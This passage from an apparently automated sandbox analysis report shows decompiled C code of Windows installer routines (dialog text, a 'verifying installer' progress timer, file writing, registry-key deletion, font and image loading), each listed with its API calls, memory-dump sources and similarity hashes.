                                                                                    					if((_t54[5] & 0x00000001) != 0) {
                                                                                    						SetTextColor(_a8, _t39);
                                                                                    					}
                                                                                    					SetBkMode(_a8, _t54[4]);
                                                                                    					_t41 = _t54[1];
                                                                                    					_v16.lbColor = _t41;
                                                                                    					if((_t54[5] & 0x00000008) != 0) {
                                                                                    						_t41 = GetSysColor(_t41);
                                                                                    						_v16.lbColor = _t41;
                                                                                    					}
                                                                                    					if((_t54[5] & 0x00000004) != 0) {
                                                                                    						SetBkColor(_a8, _t41);
                                                                                    					}
                                                                                    					if((_t54[5] & 0x00000010) != 0) {
                                                                                    						_v16.lbStyle = _t54[2];
                                                                                    						_t44 = _t54[3];
                                                                                    						if(_t44 != 0) {
                                                                                    							DeleteObject(_t44);
                                                                                    						}
                                                                                    						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                    					}
                                                                                    					return _t54[3];
                                                                                    				}
                                                                                    			}










                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                    • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                    • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040521E(CHAR* _a4, CHAR* _a8) {
                                                                                    				struct HWND__* _v8;
                                                                                    				signed int _v12;
                                                                                    				CHAR* _v32;
                                                                                    				long _v44;
                                                                                    				int _v48;
                                                                                    				void* _v52;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				CHAR* _t26;
                                                                                    				signed int _t27;
                                                                                    				CHAR* _t28;
                                                                                    				long _t29;
                                                                                    				signed int _t39;
                                                                                    
                                                                                    				_t26 =  *0x42ec04; // 0x0
                                                                                    				_v8 = _t26;
                                                                                    				if(_t26 != 0) {
                                                                                    					_t27 =  *0x42f4f4;
                                                                                    					_v12 = _t27;
                                                                                    					_t39 = _t27 & 0x00000001;
                                                                                    					if(_t39 == 0) {
                                                                                    						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
                                                                                    					}
                                                                                    					_t26 = lstrlenA(0x42a070);
                                                                                    					_a4 = _t26;
                                                                                    					if(_a8 == 0) {
                                                                                    						L6:
                                                                                    						if((_v12 & 0x00000004) == 0) {
                                                                                    							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
                                                                                    						}
                                                                                    						if((_v12 & 0x00000002) == 0) {
                                                                                    							_v32 = 0x42a070;
                                                                                    							_v52 = 1;
                                                                                    							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                    							_v44 = 0;
                                                                                    							_v48 = _t29 - _t39;
                                                                                    							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                    							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                    						}
                                                                                    						if(_t39 != 0) {
                                                                                    							_t28 = _a4;
                                                                                    							 *((char*)(_t28 + 0x42a070)) = 0;
                                                                                    							return _t28;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                    						if(_t26 < 0x800) {
                                                                                    							_t26 = lstrcatA(0x42a070, _a8);
                                                                                    							goto L6;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				return _t26;
                                                                                    			}

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                    • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                    • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,73BCEA30), ref: 0040527A
                                                                                    • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2531174081-0
                                                                                    • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                                    • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                                    • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                                    • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				long _v8;
                                                                                    				signed char _v12;
                                                                                    				unsigned int _v16;
                                                                                    				void* _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				long _v56;
                                                                                    				void* _v60;
                                                                                    				long _t15;
                                                                                    				unsigned int _t19;
                                                                                    				signed int _t25;
                                                                                    				struct HWND__* _t28;
                                                                                    
                                                                                    				_t28 = _a4;
                                                                                    				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                    				if(_a8 == 0) {
                                                                                    					L4:
                                                                                    					_v56 = _t15;
                                                                                    					_v60 = 4;
                                                                                    					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                    					return _v24;
                                                                                    				}
                                                                                    				_t19 = GetMessagePos();
                                                                                    				_v16 = _t19 >> 0x10;
                                                                                    				_v20 = _t19;
                                                                                    				ScreenToClient(_t28,  &_v20);
                                                                                    				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                    				if((_v12 & 0x00000066) != 0) {
                                                                                    					_t15 = _v8;
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				return _t25 | 0xffffffff;
                                                                                    			}

                                                                                    APIs
                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                                    • GetMessagePos.USER32 ref: 00404AF1
                                                                                    • ScreenToClient.USER32 ref: 00404B0B
                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                    • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                    • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                                    				char _v68;
                                                                                    				int _t11;
                                                                                    				int _t20;
                                                                                    
                                                                                    				if(_a8 == 0x110) {
                                                                                    					SetTimer(_a4, 1, 0xfa, 0);
                                                                                    					_a8 = 0x113;
                                                                                    				}
                                                                                    				if(_a8 == 0x113) {
                                                                                    					_t20 =  *0x41d440; // 0x66495
                                                                                    					_t11 =  *0x42944c;
                                                                                    					if(_t20 >= _t11) {
                                                                                    						_t20 = _t11;
                                                                                    					}
                                                                                    					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                    					SetWindowTextA(_a4,  &_v68);
                                                                                    					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                    • MulDiv.KERNEL32(00066495,00000064,?), ref: 00402E00
                                                                                    • wsprintfA.USER32 ref: 00402E10
                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                                    • SetDlgItemTextA.USER32 ref: 00402E32
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402E0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                    • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                                    • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                    • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E004027DF(int __ebx) {
                                                                                    				void* _t26;
                                                                                    				long _t31;
                                                                                    				int _t45;
                                                                                    				void* _t49;
                                                                                    				void* _t51;
                                                                                    				void* _t54;
                                                                                    				void* _t55;
                                                                                    				void* _t56;
                                                                                    
                                                                                    				_t45 = __ebx;
                                                                                    				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                    				_t50 = E00402BCE(0xfffffff0);
                                                                                    				 *(_t56 - 0x78) = _t23;
                                                                                    				if(E00405AFC(_t50) == 0) {
                                                                                    					E00402BCE(0xffffffed);
                                                                                    				}
                                                                                    				E00405C6B(_t50);
                                                                                    				_t26 = E00405C90(_t50, 0x40000000, 2);
                                                                                    				 *(_t56 + 8) = _t26;
                                                                                    				if(_t26 != 0xffffffff) {
                                                                                    					_t31 =  *0x42f438;
                                                                                    					 *(_t56 - 0x30) = _t31;
                                                                                    					_t49 = GlobalAlloc(0x40, _t31);
                                                                                    					if(_t49 != _t45) {
                                                                                    						E00403300(_t45);
                                                                                    						E004032EA(_t49,  *(_t56 - 0x30));
                                                                                    						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                    						 *(_t56 - 0x38) = _t54;
                                                                                    						if(_t54 != _t45) {
                                                                                    							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                    							while( *_t54 != _t45) {
                                                                                    								_t47 =  *_t54;
                                                                                    								_t55 = _t54 + 8;
                                                                                    								 *(_t56 - 0x8c) =  *_t54;
                                                                                    								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                    								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                                    							}
                                                                                    							GlobalFree( *(_t56 - 0x38));
                                                                                    						}
                                                                                    						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                    						GlobalFree(_t49);
                                                                                    						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                    					}
                                                                                    					CloseHandle( *(_t56 + 8));
                                                                                    				}
                                                                                    				_t51 = 0xfffffff3;
                                                                                    				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                    					_t51 = 0xffffffef;
                                                                                    					DeleteFileA( *(_t56 - 0x78));
                                                                                    					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                    				}
                                                                                    				_push(_t51);
                                                                                    				E00401423();
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                                                                                    				return 0;
                                                                                    			}












                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                    • GlobalFree.KERNEL32 ref: 0040288E
                                                                                    • GlobalFree.KERNEL32 ref: 004028A1
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                                    • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                                    • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                                    • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 48%
                                                                                    			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                    				void* _v8;
                                                                                    				int _v12;
                                                                                    				char _v276;
                                                                                    				void* _t27;
                                                                                    				signed int _t33;
                                                                                    				intOrPtr* _t35;
                                                                                    				signed int _t45;
                                                                                    				signed int _t46;
                                                                                    				signed int _t47;
                                                                                    
                                                                                    				_t46 = _a12;
                                                                                    				_t47 = _t46 & 0x00000300;
                                                                                    				_t45 = _t46 & 0x00000001;
                                                                                    				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                    				if(_t27 == 0) {
                                                                                    					if((_a12 & 0x00000002) == 0) {
                                                                                    						L3:
                                                                                    						_push(0x105);
                                                                                    						_push( &_v276);
                                                                                    						_push(0);
                                                                                    						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                    							__eflags = _t45;
                                                                                    							if(__eflags != 0) {
                                                                                    								L10:
                                                                                    								RegCloseKey(_v8);
                                                                                    								return 0x3eb;
                                                                                    							}
                                                                                    							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                                    							__eflags = _t33;
                                                                                    							if(_t33 != 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_push(0x105);
                                                                                    							_push( &_v276);
                                                                                    							_push(_t45);
                                                                                    						}
                                                                                    						RegCloseKey(_v8);
                                                                                    						_t35 = E00406500(3);
                                                                                    						if(_t35 != 0) {
                                                                                    							return  *_t35(_a4, _a8, _t47, 0);
                                                                                    						}
                                                                                    						return RegDeleteKeyA(_a4, _a8);
                                                                                    					}
                                                                                    					_v12 = 0;
                                                                                    					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                    						goto L10;
                                                                                    					}
                                                                                    					goto L3;
                                                                                    				}
                                                                                    				return _t27;
                                                                                    			}













                                                                                    APIs
                                                                                    • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0
                                                                                    • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                    • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                                    • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                                    • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00401D65(void* __ebx, void* __edx) {
                                                                                    				struct HWND__* _t30;
                                                                                    				CHAR* _t38;
                                                                                    				void* _t48;
                                                                                    				void* _t53;
                                                                                    				signed int _t55;
                                                                                    				signed int _t58;
                                                                                    				long _t61;
                                                                                    				void* _t65;
                                                                                    
                                                                                    				_t53 = __ebx;
                                                                                    				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                    				} else {
                                                                                    					E00402BAC(2);
                                                                                    					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                    				}
                                                                                    				_t55 =  *(_t65 - 0x1c);
                                                                                    				 *(_t65 + 8) = _t30;
                                                                                    				_t58 = _t55 & 0x00000004;
                                                                                    				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                    				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                    				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                    				if((_t55 & 0x00010000) == 0) {
                                                                                    					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                    				} else {
                                                                                    					_t38 = E00402BCE(0x11);
                                                                                    				}
                                                                                    				 *(_t65 - 8) = _t38;
                                                                                    				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                    				asm("sbb edi, edi");
                                                                                    				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                    				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                    				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                    					DeleteObject(_t48);
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                    					_push(_t61);
                                                                                    					E00406055();
                                                                                    				}
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
                                                                                    				return 0;
                                                                                    			}












                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                    • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                                    • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                                    • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E00401E35(intOrPtr __edx) {
                                                                                    				void* __esi;
                                                                                    				int _t9;
                                                                                    				signed char _t15;
                                                                                    				struct HFONT__* _t18;
                                                                                    				intOrPtr _t30;
                                                                                    				struct HDC__* _t31;
                                                                                    				void* _t33;
                                                                                    				void* _t35;
                                                                                    
                                                                                    				_t30 = __edx;
                                                                                    				_t31 = GetDC( *(_t35 - 8));
                                                                                    				_t9 = E00402BAC(2);
                                                                                    				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                    				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                    				ReleaseDC( *(_t35 - 8), _t31);
                                                                                    				 *0x40b848 = E00402BAC(3);
                                                                                    				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                    				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                    				 *0x40b84f = 1;
                                                                                    				 *0x40b84c = _t15 & 0x00000001;
                                                                                    				 *0x40b84d = _t15 & 0x00000002;
                                                                                    				 *0x40b84e = _t15 & 0x00000004;
                                                                                    				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                    				_t18 = CreateFontIndirectA(0x40b838);
                                                                                    				_push(_t18);
                                                                                    				_push(_t33);
                                                                                    				E00406055();
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                                                                                    				return 0;
                                                                                    			}












                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E38
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                    • ReleaseDC.USER32 ref: 00401E6B
                                                                                    • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3808545654-0
                                                                                    • Opcode ID: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                                    • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                                    • Opcode Fuzzy Hash: 2261fe2310d7c5dbb8815f3a1baa88f38d243da1520e0ea6a1dc02d5ce67a812
                                                                                    • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 59%
                                                                                    			E00401C2E(intOrPtr __edx) {
                                                                                    				int _t29;
                                                                                    				long _t30;
                                                                                    				signed int _t32;
                                                                                    				CHAR* _t35;
                                                                                    				long _t36;
                                                                                    				int _t41;
                                                                                    				signed int _t42;
                                                                                    				int _t46;
                                                                                    				int _t56;
                                                                                    				intOrPtr _t57;
                                                                                    				struct HWND__* _t61;
                                                                                    				void* _t64;
                                                                                    
                                                                                    				_t57 = __edx;
                                                                                    				_t29 = E00402BAC(3);
                                                                                    				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                    				 *(_t64 - 8) = _t29;
                                                                                    				_t30 = E00402BAC(4);
                                                                                    				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                    				 *(_t64 + 8) = _t30;
                                                                                    				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                    					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                                    				}
                                                                                    				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                    				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                    					 *(_t64 + 8) = E00402BCE(0x44);
                                                                                    				}
                                                                                    				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                    				_push(1);
                                                                                    				if(__eflags != 0) {
